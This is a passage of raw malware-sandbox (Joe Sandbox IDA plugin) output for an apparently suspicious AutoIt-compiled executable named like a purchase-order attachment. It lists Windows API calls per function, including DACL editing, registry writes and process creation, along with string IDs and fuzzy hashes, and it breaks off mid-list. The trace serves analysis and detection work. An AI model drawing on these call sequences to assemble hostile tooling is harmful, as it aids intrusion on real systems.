                                • SetTimer.USER32(00000000,00000000,00000028,001690FC), ref: 00168AA8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                • String ID: AutoIt v3 GUI
                                • API String ID: 1458621304-248962490
                                • Opcode ID: cf36ffa0cef7154d1e305887dc6dba8bae60cfee0443ac186c5fc64bd3646938
                                • Instruction ID: a2672b45cb9fbf618d7c18b9ba919e0908ddd171aa6545aeabe2858f37659a8d
                                • Opcode Fuzzy Hash: cf36ffa0cef7154d1e305887dc6dba8bae60cfee0443ac186c5fc64bd3646938
                                • Instruction Fuzzy Hash: 46B19D75A00209AFDB14DFA8DC89FAE7BB5FB48314F154219FA15AB290DB30A851CF51
                                APIs
                                  • Part of subcall function 001B10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001B1114
                                  • Part of subcall function 001B10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,001B0B9B,?,?,?), ref: 001B1120
                                  • Part of subcall function 001B10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,001B0B9B,?,?,?), ref: 001B112F
                                  • Part of subcall function 001B10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,001B0B9B,?,?,?), ref: 001B1136
                                  • Part of subcall function 001B10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 001B114D
                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 001B0DF5
                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 001B0E29
                                • GetLengthSid.ADVAPI32(?), ref: 001B0E40
                                • GetAce.ADVAPI32(?,00000000,?), ref: 001B0E7A
                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001B0E96
                                • GetLengthSid.ADVAPI32(?), ref: 001B0EAD
                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 001B0EB5
                                • HeapAlloc.KERNEL32(00000000), ref: 001B0EBC
                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 001B0EDD
                                • CopySid.ADVAPI32(00000000), ref: 001B0EE4
                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 001B0F13
                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001B0F35
                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 001B0F47
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001B0F6E
                                • HeapFree.KERNEL32(00000000), ref: 001B0F75
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001B0F7E
                                • HeapFree.KERNEL32(00000000), ref: 001B0F85
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001B0F8E
                                • HeapFree.KERNEL32(00000000), ref: 001B0F95
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 001B0FA1
                                • HeapFree.KERNEL32(00000000), ref: 001B0FA8
                                  • Part of subcall function 001B1193: GetProcessHeap.KERNEL32(00000008,001B0BB1,?,00000000,?,001B0BB1,?), ref: 001B11A1
                                  • Part of subcall function 001B1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,001B0BB1,?), ref: 001B11A8
                                  • Part of subcall function 001B1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,001B0BB1,?), ref: 001B11B7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                • String ID:
                                • API String ID: 4175595110-0
                                • Opcode ID: 365165600e43cbaca138e706d2db661535369f410b0f9a8ca5d5c62b782e2fcf
                                • Instruction ID: e4dca2856a8dd8ec66b152bc9d0124a020c05f6b5a6599d5e7ad154cd698a19e
                                • Opcode Fuzzy Hash: 365165600e43cbaca138e706d2db661535369f410b0f9a8ca5d5c62b782e2fcf
                                • Instruction Fuzzy Hash: 13713E71A0020AEBDF219FA4DC45FEFBBB8BF09310F148159F919EA191D7719A45CBA0
                                APIs
                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001DC4BD
                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,001ECC08,00000000,?,00000000,?,?), ref: 001DC544
                                • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 001DC5A4
                                • _wcslen.LIBCMT ref: 001DC5F4
                                • _wcslen.LIBCMT ref: 001DC66F
                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 001DC6B2
                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 001DC7C1
                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 001DC84D
                                • RegCloseKey.ADVAPI32(?), ref: 001DC881
                                • RegCloseKey.ADVAPI32(00000000), ref: 001DC88E
                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 001DC960
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                • API String ID: 9721498-966354055
                                • Opcode ID: 2f290bb12c08c2e806238d75624f5fa35ea3c16422feadc3c4fd239d4b985492
                                • Instruction ID: d8912816042648fcee3af71ac8376a4ba1b1e875d11ed8f19c5a5d9af54deae1
                                • Opcode Fuzzy Hash: 2f290bb12c08c2e806238d75624f5fa35ea3c16422feadc3c4fd239d4b985492
                                • Instruction Fuzzy Hash: 6B125635604201DFCB14DF24D881A2AB7E5EF88725F04885DF89A9B3A2DB31ED45CB81
                                APIs
                                • CharUpperBuffW.USER32(?,?), ref: 001E09C6
                                • _wcslen.LIBCMT ref: 001E0A01
                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001E0A54
                                • _wcslen.LIBCMT ref: 001E0A8A
                                • _wcslen.LIBCMT ref: 001E0B06
                                • _wcslen.LIBCMT ref: 001E0B81
                                  • Part of subcall function 0016F9F2: _wcslen.LIBCMT ref: 0016F9FD
                                  • Part of subcall function 001B2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001B2BFA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _wcslen$MessageSend$BuffCharUpper
                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                • API String ID: 1103490817-4258414348
                                • Opcode ID: 252e72f6885c459ff379819bee2d6aec2075036b8b5cc0b1313d4a0a2d875e10
                                • Instruction ID: 80427f7f087eb66a85ac83602308ddba293a2fa3b0ac98c233842aa4a15e79bb
                                • Opcode Fuzzy Hash: 252e72f6885c459ff379819bee2d6aec2075036b8b5cc0b1313d4a0a2d875e10
                                • Instruction Fuzzy Hash: E8E1CF35208781CFC715DF25C85086EB7E1BFA8318B15895DF8969B3A2D770ED89CB81
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _wcslen$BuffCharUpper
                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                • API String ID: 1256254125-909552448
                                • Opcode ID: 20b88b47279353510ec4cf1d1d31a46b78242ebb47bf285d58f9a4c05d1fd41c
                                • Instruction ID: d6245dd430dde039f165571733629b2fe9eb1e58e217e3a2b12c72540eed256d
                                • Opcode Fuzzy Hash: 20b88b47279353510ec4cf1d1d31a46b78242ebb47bf285d58f9a4c05d1fd41c
                                • Instruction Fuzzy Hash: 7A71E23261016B8BCB20DE6CCD515BB33A5ABB4794B150A2AF8669B384F731CD95C3E0
                                APIs
                                • _wcslen.LIBCMT ref: 001E835A
                                • _wcslen.LIBCMT ref: 001E836E
                                • _wcslen.LIBCMT ref: 001E8391
                                • _wcslen.LIBCMT ref: 001E83B4
                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 001E83F2
                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,001E5BF2), ref: 001E844E
                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 001E8487
                                • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 001E84CA
                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 001E8501
                                • FreeLibrary.KERNEL32(?), ref: 001E850D
                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 001E851D
                                • DestroyIcon.USER32(?,?,?,?,?,001E5BF2), ref: 001E852C
                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 001E8549
                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 001E8555
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                • String ID: .dll$.exe$.icl
                                • API String ID: 799131459-1154884017
                                • Opcode ID: e210cd6324be3034f49bcf58c00d27e57b901f29b9a9821d503ad88d9bf70393
                                • Instruction ID: fc55935db32132765dd03179264695d372ea9979399e8fb44e639ddb7af06e65
                                • Opcode Fuzzy Hash: e210cd6324be3034f49bcf58c00d27e57b901f29b9a9821d503ad88d9bf70393
                                • Instruction Fuzzy Hash: D961DD71500A55BBEB14DF65CC81BBE77A8FF18B11F104609F919EA0D1EF74A990CBA0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                • API String ID: 0-1645009161
                                • Opcode ID: c42dcee2efd18199cd10c8f1a8066386f9289a3b45e58e05c66e6c67c36e00b9
                                • Instruction ID: 7247a3f6008b533b1c2e1aaa10308fff320aa1767db4cc3ed6eb313b38e1e8a2
                                • Opcode Fuzzy Hash: c42dcee2efd18199cd10c8f1a8066386f9289a3b45e58e05c66e6c67c36e00b9
                                • Instruction Fuzzy Hash: DC81F371640605EBDB25AF60EC47FAE37A9AF25301F144024FD18AF1D6EB70DA16C7A1
                                APIs
                                • LoadIconW.USER32(00000063), ref: 001B5A2E
                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 001B5A40
                                • SetWindowTextW.USER32(?,?), ref: 001B5A57
                                • GetDlgItem.USER32(?,000003EA), ref: 001B5A6C
                                • SetWindowTextW.USER32(00000000,?), ref: 001B5A72
                                • GetDlgItem.USER32(?,000003E9), ref: 001B5A82
                                • SetWindowTextW.USER32(00000000,?), ref: 001B5A88
                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 001B5AA9
                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 001B5AC3
                                • GetWindowRect.USER32(?,?), ref: 001B5ACC
                                • _wcslen.LIBCMT ref: 001B5B33
                                • SetWindowTextW.USER32(?,?), ref: 001B5B6F
                                • GetDesktopWindow.USER32 ref: 001B5B75
                                • GetWindowRect.USER32(00000000), ref: 001B5B7C
                                • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 001B5BD3
                                • GetClientRect.USER32(?,?), ref: 001B5BE0
                                • PostMessageW.USER32(?,00000005,00000000,?), ref: 001B5C05
                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 001B5C2F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                • String ID:
                                • API String ID: 895679908-0
                                • Opcode ID: e4da5687edfecad64d0ec3c3a4fa2d26272cdff695b096afeb86de434ca3f5a2
                                • Instruction ID: f1ac7fb0f1c883ce79a91c4ca64db9b0c92fe5a110eaac1490b8a1067f55c896
                                • Opcode Fuzzy Hash: e4da5687edfecad64d0ec3c3a4fa2d26272cdff695b096afeb86de434ca3f5a2
                                • Instruction Fuzzy Hash: 4E716D31900B09AFDB20DFA9CE85BAEBBF6FF48704F104518E542A76A0D775E945CB50
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _wcslen
                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[!
                                • API String ID: 176396367-2891400992
                                • Opcode ID: c9babb239876d378d57653d0dd10fbcf10029a962191d244b7042387136036d1
                                • Instruction ID: 341570cc986afb8cc324ff6d4a9055ec64c6e8ee38ae2350151a07c70473d904
                                • Opcode Fuzzy Hash: c9babb239876d378d57653d0dd10fbcf10029a962191d244b7042387136036d1
                                • Instruction Fuzzy Hash: 5FE1F731A00526EBCB289F78C8416EEFBB4BF64714F558159E476E7240DB30AFA9C790
                                APIs
                                • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 001700C6
                                  • Part of subcall function 001700ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0022070C,00000FA0,ED7A0071,?,?,?,?,001923B3,000000FF), ref: 0017011C
                                  • Part of subcall function 001700ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,001923B3,000000FF), ref: 00170127
                                  • Part of subcall function 001700ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,001923B3,000000FF), ref: 00170138
                                  • Part of subcall function 001700ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0017014E
                                  • Part of subcall function 001700ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0017015C
                                  • Part of subcall function 001700ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0017016A
                                  • Part of subcall function 001700ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00170195
                                  • Part of subcall function 001700ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 001701A0
                                • ___scrt_fastfail.LIBCMT ref: 001700E7
                                  • Part of subcall function 001700A3: __onexit.LIBCMT ref: 001700A9
                                Strings
                                • SleepConditionVariableCS, xrefs: 00170154
                                • kernel32.dll, xrefs: 00170133
                                • InitializeConditionVariable, xrefs: 00170148
                                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00170122
                                • WakeAllConditionVariable, xrefs: 00170162
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                • API String ID: 66158676-1714406822
                                • Opcode ID: 3bbcb1bf2e22a07ec908ea673c29008e07f2816c6265658d8e00a029e88e7184
                                • Instruction ID: e356922bb1980496ccd717467a1baf5552c58520123243afcaa1d9daacac54b2
                                • Opcode Fuzzy Hash: 3bbcb1bf2e22a07ec908ea673c29008e07f2816c6265658d8e00a029e88e7184
                                • Instruction Fuzzy Hash: 9A21F932A44750EBD7226BE4BC89B6E77F4EB0DB61F01813DFC0596691DBB09C418A90
                                APIs
                                • CharLowerBuffW.USER32(00000000,00000000,001ECC08), ref: 001C4527
                                • _wcslen.LIBCMT ref: 001C453B
                                • _wcslen.LIBCMT ref: 001C4599
                                • _wcslen.LIBCMT ref: 001C45F4
                                • _wcslen.LIBCMT ref: 001C463F
                                • _wcslen.LIBCMT ref: 001C46A7
                                  • Part of subcall function 0016F9F2: _wcslen.LIBCMT ref: 0016F9FD
                                • GetDriveTypeW.KERNEL32(?,00216BF0,00000061), ref: 001C4743
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _wcslen$BuffCharDriveLowerType
                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                • API String ID: 2055661098-1000479233
                                • Opcode ID: 786217f83316d2d2488c395c19c9af77e7c26d07260b9c40ffb14c9e905a8aca
                                • Instruction ID: aed63cb13965299cfd2ff0b53bc85122b9afc9b19351049dc1e64fd06d21307e
                                • Opcode Fuzzy Hash: 786217f83316d2d2488c395c19c9af77e7c26d07260b9c40ffb14c9e905a8aca
                                • Instruction Fuzzy Hash: 58B1EE3160C3129FC724DF28C8A0E6EB7E5AFB5724F50491DF4A6C7291E730D989CA92
                                APIs
                                  • Part of subcall function 00169BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00169BB2
                                • DragQueryPoint.SHELL32(?,?), ref: 001E9147
                                  • Part of subcall function 001E7674: ClientToScreen.USER32(?,?), ref: 001E769A
                                  • Part of subcall function 001E7674: GetWindowRect.USER32(?,?), ref: 001E7710
                                  • Part of subcall function 001E7674: PtInRect.USER32(?,?,001E8B89), ref: 001E7720
                                • SendMessageW.USER32(?,000000B0,?,?), ref: 001E91B0
                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 001E91BB
                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 001E91DE
                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 001E9225
                                • SendMessageW.USER32(?,000000B0,?,?), ref: 001E923E
                                • SendMessageW.USER32(?,000000B1,?,?), ref: 001E9255
                                • SendMessageW.USER32(?,000000B1,?,?), ref: 001E9277
                                • DragFinish.SHELL32(?), ref: 001E927E
                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 001E9371
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#"
                                • API String ID: 221274066-2770955705
                                • Opcode ID: a842275943251ea8e1eae865721eac10eb7c78a8ca96714ad7a0d06066b38838
                                • Instruction ID: 66afaa6a605685e56af0162986c42b66183c84e9430487698f711a4cc01eea3c
                                • Opcode Fuzzy Hash: a842275943251ea8e1eae865721eac10eb7c78a8ca96714ad7a0d06066b38838
                                • Instruction Fuzzy Hash: BA618A71108341AFC701DFA4DC85DAFBBE8EF99750F40091EF9A1961A1DB709A4ACB92
                                APIs
                                • _wcslen.LIBCMT ref: 001DB198
                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 001DB1B0
                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 001DB1D4
                                • _wcslen.LIBCMT ref: 001DB200
                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001DB214
                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001DB236
                                • _wcslen.LIBCMT ref: 001DB332
                                  • Part of subcall function 001C05A7: GetStdHandle.KERNEL32(000000F6), ref: 001C05C6
                                • _wcslen.LIBCMT ref: 001DB34B
                                • _wcslen.LIBCMT ref: 001DB366
                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 001DB3B6
                                • GetLastError.KERNEL32(00000000), ref: 001DB407
                                • CloseHandle.KERNEL32(?), ref: 001DB439
                                • CloseHandle.KERNEL32(00000000), ref: 001DB44A
                                • CloseHandle.KERNEL32(00000000), ref: 001DB45C
                                • CloseHandle.KERNEL32(00000000), ref: 001DB46E
                                • CloseHandle.KERNEL32(?), ref: 001DB4E3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                • String ID:
                                • API String ID: 2178637699-0
                                • Opcode ID: bcd0bfebedb11c09046ff1eda8938e4197ba3e1339fc2dc14ef36ca9d9bde27a
                                • Instruction ID: 7f5e906cb782ac9c7ac8d13197de103f6d8500bbf66caaa21838b6687145cb3e
                                • Opcode Fuzzy Hash: bcd0bfebedb11c09046ff1eda8938e4197ba3e1339fc2dc14ef36ca9d9bde27a
                                • Instruction Fuzzy Hash: 8CF16731608340DFC714EF24D891A6EBBE1AF95314F15855EF89A8B3A2DB31EC45CB92
                                APIs
                                • GetMenuItemCount.USER32(00221990), ref: 00192F8D
                                • GetMenuItemCount.USER32(00221990), ref: 0019303D
                                • GetCursorPos.USER32(?), ref: 00193081
                                • SetForegroundWindow.USER32(00000000), ref: 0019308A
